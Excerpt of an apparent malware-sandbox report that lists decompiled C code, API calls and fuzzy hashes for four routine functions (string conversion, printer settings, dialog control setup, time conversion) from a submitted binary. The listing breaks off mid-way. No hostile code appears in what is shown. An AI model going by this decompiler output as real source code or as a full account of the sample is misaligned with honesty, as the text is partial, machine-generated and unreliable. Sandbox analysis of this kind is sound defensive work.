                                                                              • Opcode ID: 6000828566af01fef4d8e1c6a40a408aa4e19570ac13028f7f3b67f35117f121
                                                                              • Instruction ID: 1d95b8d08a7fe6b5b7f5d9d151d5b52b6a96979c5d7756129b4b05627891fd48
                                                                              • Opcode Fuzzy Hash: 6000828566af01fef4d8e1c6a40a408aa4e19570ac13028f7f3b67f35117f121
                                                                              • Instruction Fuzzy Hash: C631067250C2556FDB203B659C888BBBBBCEF49398725053BF146C3211E6688CC1C2BE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041FE10, Relevance: 12.1, APIs: 8, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E0041FE10(short* _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				signed int _t22;
				char* _t38;
				short* _t47;
				int _t49;
				int _t56;
				intOrPtr _t62;

				_push(0xffffffff);
				_push(E00431520);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t47 = _a4;
				_v20 = _t62 - 0x10;
				if(_t47 == 0) {
					L8:
					__eflags = 0;
					 *[fs:0x0] = _v16;
					return 0;
				} else {
					_t56 = E0041229D(_t47) + 1;
					_v24 = _t56;
					_t49 = WideCharToMultiByte(0, 0, _t47, _t56, 0, 0, 0, 0);
					_v28 = _t49;
					if(_t49 != 0) {
						_v8 = 0;
						_t38 = E00424440(_t49);
						__eflags = _t38;
						_v8 = 0xffffffff;
						if(_t38 != 0) {
							__eflags = WideCharToMultiByte(0, 0, _a4, _t56, _t38, _t49, 0, 0);
							if(__eflags == 0) {
								_push(_t38);
								L0042446B(_t38, _t49, _t56, __eflags);
								_t38 = 0;
								_t21 = GetLastError();
								__eflags = _t21;
								if(_t21 > 0) {
									_t22 = GetLastError();
									_t24 = _t22 & 0x0000ffff | 0x80070000;
									__eflags = _t22 & 0x0000ffff | 0x80070000;
								} else {
									_t24 = GetLastError();
								}
								E0041FC30(_t24);
							}
							 *[fs:0x0] = _v16;
							return _t38;
						} else {
							E0041FC30(0x8007000e);
							goto L8;
						}
					} else {
						if(GetLastError() > 0) {
							E0041FC30(GetLastError() & 0x0000ffff | 0x80070000);
							__eflags = 0;
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							E0041FC30(GetLastError());
							 *[fs:0x0] = _v16;
							return 0;
						}
					}
				}
			}



















                                                                              0x0041fe13
                                                                              0x0041fe15
                                                                              0x0041fe20
                                                                              0x0041fe21
                                                                              0x0041fe2e
                                                                              0x0041fe33
                                                                              0x0041fe36
                                                                              0x0041fef7
                                                                              0x0041fef7
                                                                              0x0041fefc
                                                                              0x0041ff09
                                                                              0x0041fe3c
                                                                              0x0041fe4f
                                                                              0x0041fe56
                                                                              0x0041fe5f
                                                                              0x0041fe63
                                                                              0x0041fe66
                                                                              0x0041feb9
                                                                              0x0041fec8
                                                                              0x0041fee2
                                                                              0x0041fee4
                                                                              0x0041feeb
                                                                              0x0041ff21
                                                                              0x0041ff23
                                                                              0x0041ff25
                                                                              0x0041ff26
                                                                              0x0041ff34
                                                                              0x0041ff36
                                                                              0x0041ff38
                                                                              0x0041ff3a
                                                                              0x0041ff40
                                                                              0x0041ff47
                                                                              0x0041ff47
                                                                              0x0041ff3c
                                                                              0x0041ff3c
                                                                              0x0041ff3c
                                                                              0x0041ff4d
                                                                              0x0041ff4d
                                                                              0x0041ff59
                                                                              0x0041ff64
                                                                              0x0041feed
                                                                              0x0041fef2
                                                                              0x00000000
                                                                              0x0041fef2
                                                                              0x0041fe68
                                                                              0x0041fe72
                                                                              0x0041fe9e
                                                                              0x0041fea3
                                                                              0x0041fea8
                                                                              0x0041feb5
                                                                              0x0041fe74
                                                                              0x0041fe77
                                                                              0x0041fe81
                                                                              0x0041fe8e
                                                                              0x0041fe8e
                                                                              0x0041fe72
                                                                              0x0041fe66

                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 0041FE59
                                                                              • GetLastError.KERNEL32 ref: 0041FE6E
                                                                              • GetLastError.KERNEL32 ref: 0041FE74
                                                                              • GetLastError.KERNEL32 ref: 0041FE91
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 0041FF1B
                                                                              • GetLastError.KERNEL32 ref: 0041FF36
                                                                              • GetLastError.KERNEL32 ref: 0041FF3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3361762293-0
                                                                              • Opcode ID: fecaefe3e211d7647a63063ff122df463c4eda3e344745a5b9ee0a1726c1b895
                                                                              • Instruction ID: 124527d97ceff0da58b9e06ee148f11ea4f0a8120544b77b93a5adb531dfb126
                                                                              • Opcode Fuzzy Hash: fecaefe3e211d7647a63063ff122df463c4eda3e344745a5b9ee0a1726c1b895
                                                                              • Instruction Fuzzy Hash: 94312D73B40718AAD320EB65AD02BABBB68EB45764F10017BFD08D3381D679581685D9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042386A, Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0042386A(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E0042AC36(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0042AC36( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                              0x0042386d
                                                                              0x0042386f
                                                                              0x00423871
                                                                              0x00423879
                                                                              0x00423893
                                                                              0x0042389b
                                                                              0x004238a5
                                                                              0x004238ac
                                                                              0x004238ae
                                                                              0x004238b3
                                                                              0x004238b6
                                                                              0x004238b6
                                                                              0x004238cd
                                                                              0x004238d4
                                                                              0x004238ec
                                                                              0x004238f1
                                                                              0x004238f6
                                                                              0x004238f6
                                                                              0x004238fc
                                                                              0x004238fc
                                                                              0x004238ac
                                                                              0x00423901
                                                                              0x00423905

                                                                              APIs
                                                                              • GlobalLock.KERNEL32 ref: 00423887
                                                                              • lstrcmpA.KERNEL32(?,?), ref: 00423893
                                                                              • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 004238A5
                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004238C5
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004238CD
                                                                              • GlobalLock.KERNEL32 ref: 004238D7
                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004238E4
                                                                              • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004238FC
                                                                                • Part of subcall function 0042AC36: GlobalFlags.KERNEL32(?), ref: 0042AC40
                                                                                • Part of subcall function 0042AC36: GlobalUnlock.KERNEL32(?,00000000,?,004238F6,?,00000000,?,?,00000000,00000000,00000002), ref: 0042AC51
                                                                                • Part of subcall function 0042AC36: GlobalFree.KERNEL32 ref: 0042AC5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                              • String ID:
                                                                              • API String ID: 168474834-0
                                                                              • Opcode ID: a80ad83adf27fd997470dd9de678f8190c393b3af6f62724f7ee089163f35a53
                                                                              • Instruction ID: 1752808c9f65d41e51f4affcf3997c4520a7e2a2ffb237983be52013856d63c8
                                                                              • Opcode Fuzzy Hash: a80ad83adf27fd997470dd9de678f8190c393b3af6f62724f7ee089163f35a53
                                                                              • Instruction Fuzzy Hash: 9511C472200108BFDB216FA6DC45D6FBABDFB85704B50442EFA01D1111D679CA51EB68
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00408AD1, Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E00408AD1(void* __esi) {
				void* __ebx;
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E004128A0(E00430E13, _t239);
				_t132 =  *0x457184; // 0xc72e1596
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E00428A50();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E00424440(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E0040C619(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E0040763F(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E0042B9DF(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E0040A476( *((intOrPtr*)(_t239 + 8))) != 0 && E0040AE20( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E0040BB07( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E004075F2(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E0042BD4A(_t239 - 0x94, _t218);
				E00401000( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E00412FBB(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}































                                                                              0x00408ad1
                                                                              0x00408ad6
                                                                              0x00408ae1
                                                                              0x00408ae8
                                                                              0x00408aeb
                                                                              0x00408aee
                                                                              0x00408af3
                                                                              0x00408af6
                                                                              0x00408af9
                                                                              0x00408b01
                                                                              0x00408b07
                                                                              0x00408b0e
                                                                              0x00408b18
                                                                              0x00408b20
                                                                              0x00408b28
                                                                              0x00408b2b
                                                                              0x00408b2f
                                                                              0x00408b33
                                                                              0x00408b36
                                                                              0x00408b36
                                                                              0x00408b39
                                                                              0x00408b47
                                                                              0x00408b48
                                                                              0x00408b4c
                                                                              0x00408b5b
                                                                              0x00408b5e
                                                                              0x00408b61
                                                                              0x00408b64
                                                                              0x00408b6e
                                                                              0x00408b71
                                                                              0x00408b74
                                                                              0x00408b76
                                                                              0x00408b78
                                                                              0x00408b7c
                                                                              0x00408b81
                                                                              0x00408b85
                                                                              0x00408b8b
                                                                              0x00408b8d
                                                                              0x00408b8f
                                                                              0x00408b92
                                                                              0x00408b92
                                                                              0x00408b95
                                                                              0x00408b95
                                                                              0x00408b97
                                                                              0x00408b9a
                                                                              0x00408b9f
                                                                              0x00408ba9
                                                                              0x00408bb2
                                                                              0x00408bb5
                                                                              0x00408bb8
                                                                              0x00408bbb
                                                                              0x00408bbe
                                                                              0x00408bcc
                                                                              0x00408bce
                                                                              0x00408bce
                                                                              0x00408bd1
                                                                              0x00408bd6
                                                                              0x00408bd9
                                                                              0x00408bdc
                                                                              0x00408be2
                                                                              0x00408be2
                                                                              0x00408be4
                                                                              0x00408be8
                                                                              0x00408bef
                                                                              0x00408bf5
                                                                              0x00408bf8
                                                                              0x00408bfc
                                                                              0x00408c33
                                                                              0x00408c39
                                                                              0x00408c3c
                                                                              0x00408c3e
                                                                              0x00408c42
                                                                              0x00408c56
                                                                              0x00408c56
                                                                              0x00408c44
                                                                              0x00408c4f
                                                                              0x00408c4f
                                                                              0x00408c58
                                                                              0x00408c5c
                                                                              0x00408bfe
                                                                              0x00408c00
                                                                              0x00408c03
                                                                              0x00408c08
                                                                              0x00408c0f
                                                                              0x00408c12
                                                                              0x00408c1a
                                                                              0x00408c1f
                                                                              0x00408c22
                                                                              0x00408c25
                                                                              0x00408c2c
                                                                              0x00408c2c
                                                                              0x00408c5f
                                                                              0x00408c68
                                                                              0x00408c68
                                                                              0x00408c6b
                                                                              0x00408c6e
                                                                              0x00408c6e
                                                                              0x00408c75
                                                                              0x00408c78
                                                                              0x00408c7f
                                                                              0x00408c80
                                                                              0x00408c81
                                                                              0x00408c8b
                                                                              0x00408c83
                                                                              0x00408c83
                                                                              0x00408c83
                                                                              0x00408c91
                                                                              0x00408c92
                                                                              0x00408c9b
                                                                              0x00408c9c
                                                                              0x00408c9f
                                                                              0x00408cb6
                                                                              0x00408cba
                                                                              0x00408cbd
                                                                              0x00408cbf
                                                                              0x00408cc4
                                                                              0x00408d13
                                                                              0x00408d27
                                                                              0x00408d33
                                                                              0x00408d46
                                                                              0x00408d52
                                                                              0x00408d5f
                                                                              0x00408d6b
                                                                              0x00408d6b
                                                                              0x00408d75
                                                                              0x00408d7a
                                                                              0x00408d7a
                                                                              0x00408d80
                                                                              0x00408d85
                                                                              0x00408d97
                                                                              0x00408d87
                                                                              0x00408d8f
                                                                              0x00408d91
                                                                              0x00408d91
                                                                              0x00408d9f
                                                                              0x00408da3
                                                                              0x00408dae
                                                                              0x00408db7
                                                                              0x00408dca

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00408AD6
                                                                              • MapDialogRect.USER32(?,?), ref: 00408B64
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00408B85
                                                                              • CLSIDFromString.OLE32(?,00000004), ref: 00408C83
                                                                              • CLSIDFromProgID.OLE32(?,00000004), ref: 00408C8B
                                                                              • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 00408D27
                                                                              • SysFreeString.OLEAUT32(?), ref: 00408D7A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                              • String ID:
                                                                              • API String ID: 493809305-0
                                                                              • Opcode ID: 03bf8b8cdc28ec8505d0e252b5335381370a1e502a4a69656ce9b3d10cdefcd4
                                                                              • Instruction ID: a3d8b8c44afa29ed9ebfc78315a3d4da029f906ac5177d10787a3bac61a36b19
                                                                              • Opcode Fuzzy Hash: 03bf8b8cdc28ec8505d0e252b5335381370a1e502a4a69656ce9b3d10cdefcd4
                                                                              • Instruction Fuzzy Hash: 4EA13771900219DFDB14DFA9C984AEEBBB4FF08304F14452EE849A7391D774AD51CBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A32F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0041A32F(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E00416254(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E00414150(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E00414110(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E00414110(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E00414150(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E00414110(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x457958;
										if(_v12 == 0) {
											_t159 = 0x45798c;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E00414150( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E00414150(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E00414110(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E00414150(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E00412247(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x45a750;
						goto L10;
					}
				}
			}









































                                                                              0x0041a335
                                                                              0x0041a338
                                                                              0x0041a33d
                                                                              0x0041a342
                                                                              0x0041a344
                                                                              0x0041a347
                                                                              0x0041a34a
                                                                              0x0041a34f
                                                                              0x0041a351
                                                                              0x0041a353
                                                                              0x0041a54d
                                                                              0x00000000
                                                                              0x0041a363
                                                                              0x0041a363
                                                                              0x0041a369
                                                                              0x00000000
                                                                              0x0041a379
                                                                              0x0041a37d
                                                                              0x0041a395
                                                                              0x0041a395
                                                                              0x0041a398
                                                                              0x0041a3a8
                                                                              0x0041a3ab
                                                                              0x0041a3b1
                                                                              0x0041a3bb
                                                                              0x0041a3be
                                                                              0x0041a3c1
                                                                              0x0041a3c8
                                                                              0x0041a3c9
                                                                              0x0041a3ce
                                                                              0x0041a3db
                                                                              0x0041a3de
                                                                              0x0041a3e2
                                                                              0x0041a3e5
                                                                              0x0041a3ea
                                                                              0x0041a3ed
                                                                              0x0041a3f4
                                                                              0x0041a3f8
                                                                              0x0041a408
                                                                              0x0041a40a
                                                                              0x0041a40d
                                                                              0x0041a411
                                                                              0x0041a461
                                                                              0x0041a462
                                                                              0x0041a467
                                                                              0x0041a476
                                                                              0x0041a47e
                                                                              0x0041a484
                                                                              0x0041a488
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a488
                                                                              0x0041a46e
                                                                              0x0041a46f
                                                                              0x0041a470
                                                                              0x0041a474
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a419
                                                                              0x0041a419
                                                                              0x0041a41c
                                                                              0x0041a41f
                                                                              0x0041a425
